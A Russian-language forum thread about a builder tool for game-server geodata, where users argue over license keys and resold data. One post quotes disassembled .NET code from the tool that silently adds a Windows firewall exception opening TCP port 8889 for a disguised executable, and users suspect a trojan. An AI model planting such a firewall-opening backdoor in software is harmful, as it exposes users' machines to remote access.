Рейтинг темы:
  • 0 Голос(ов) - 0 в среднем
  • 1
  • 2
  • 3
  • 4
  • 5
Goddess of Destruction InBuilder
darkevil Написал:Расскажешь какие ключи? Smile

Это ты решил потролить или лишится пару десятки лапухов покупающих ваше гео за 400$ ?
Ответ
Deazer;149313 Написал:Это ты решил потролить или лишится пару десятки лапухов покупающих ваше гео за 400$ ?
Тактично уже были решены примерно половины Smile Остальные так и будут тарится ей, ибо мозг включить же не вариант Smile
Ответ
Deazer Написал:Это ты решил потролить или лишится пару десятки лапухов покупающих ваше гео за 400$ ?

Честно мне все равно Smile

Деньги нужны тупо для нормального дедика, на свои кровные поднимать не хочется.

Да и к чему такая резкость, я вроде не язвил, вопрос вполне рационален, заикнулся будь добр, нет, мог бы и промолчать.
Знаешь больше молодец возьми с полки леденец.
[Изображение: 61b684.png]
Ответ
darkevil Написал:Честно мне все равно Smile

Деньги нужны тупо для нормального дедика, на свои кровные поднимать не хочется.

Да и к чему такая резкость, я вроде не язвил, вопрос вполне рационален, заикнулся будь добр, нет, мог бы и промолчать.
Знаешь больше молодец возьми с полки леденец.

Big Grin леденец оставь себе , спасибо.
А по теме , все наверное знают что давно давно еще поднимал тему с билдами гео и т.д. и объяснял свою позицию в теме шары и да , конечно язвил , потому что суть прекрасно сам знаешь.
Ответ
Нельзя пересекаться даркевилу и дизеру в темах)
Web программист\разработчик

— Есть только один способ проделать большую работу — полюбить ее. Если вы к этому не пришли, подождите. Не беритесь за дело.
Ответ
[STIGMATED];149332 Написал:Нельзя пересекаться даркевилу и дизеру в темах)
Да ладно тебе, не поняли чутка друг друга. Обычно у меня с Оззи бывают споры.
[Изображение: 61b684.png]
Ответ
PHP код:
<?php 
loc_46B
: // CODE XREF: doPrivilleged+21j
ldsfld class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.Registry::LocalMachine
ldstr
"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\GloballyOpenPorts\\List"
callvirt instance class [mscorlib]Microsoft.Win32.RegistryKey [mscorlib]Microsoft.Win32.RegistryKey::CreateSubKey(string)
pop
ldloc.0
ldstr
"8889:TCP"
ldstr "8889:TCP:*:Enabled:@tsvnёaёhe.exe,-22009"
callvirt instance void [mscorlib]Microsoft.Win32.RegistryKey::SetValue(string, object)
и за каким... напхали этого шлака в g_builder... :confused:
Ответ
Исключение в файрволе винды Big Grin Скорее всего результат работы PrivellegeManager, я дальше вмбокса все равно его не рисковал запускать - от греха подальше.
Ответ
Неужели в этом билдере какой то експлоит...)))))
Ответ
Дайте билдер рабочий и будет вам гео в течении недели максимум ( сервак есть такой, что слюньки потекут от конфигурации, не буду говорит какой ^_^ ). На деле 1 день билда, 6 дней на вылавливания человека на работе Big Grin
СЕО Оптимизация сайтов
Ответ

Возможно похожие темы ...
Тема Автор Ответы Просмотры Последний пост
  goddess of destruction gorodetskiy 10 6,024 03-27-2012, 11:28 PM
Последний пост: KilRoy
  Карта квадратов под Goddess of Destruction kubanlan 4 4,003 03-09-2012, 08:32 PM
Последний пост: Mifesto

Перейти к форуму:

Пользователи, просматривающие эту тему: 1 Гость(ей)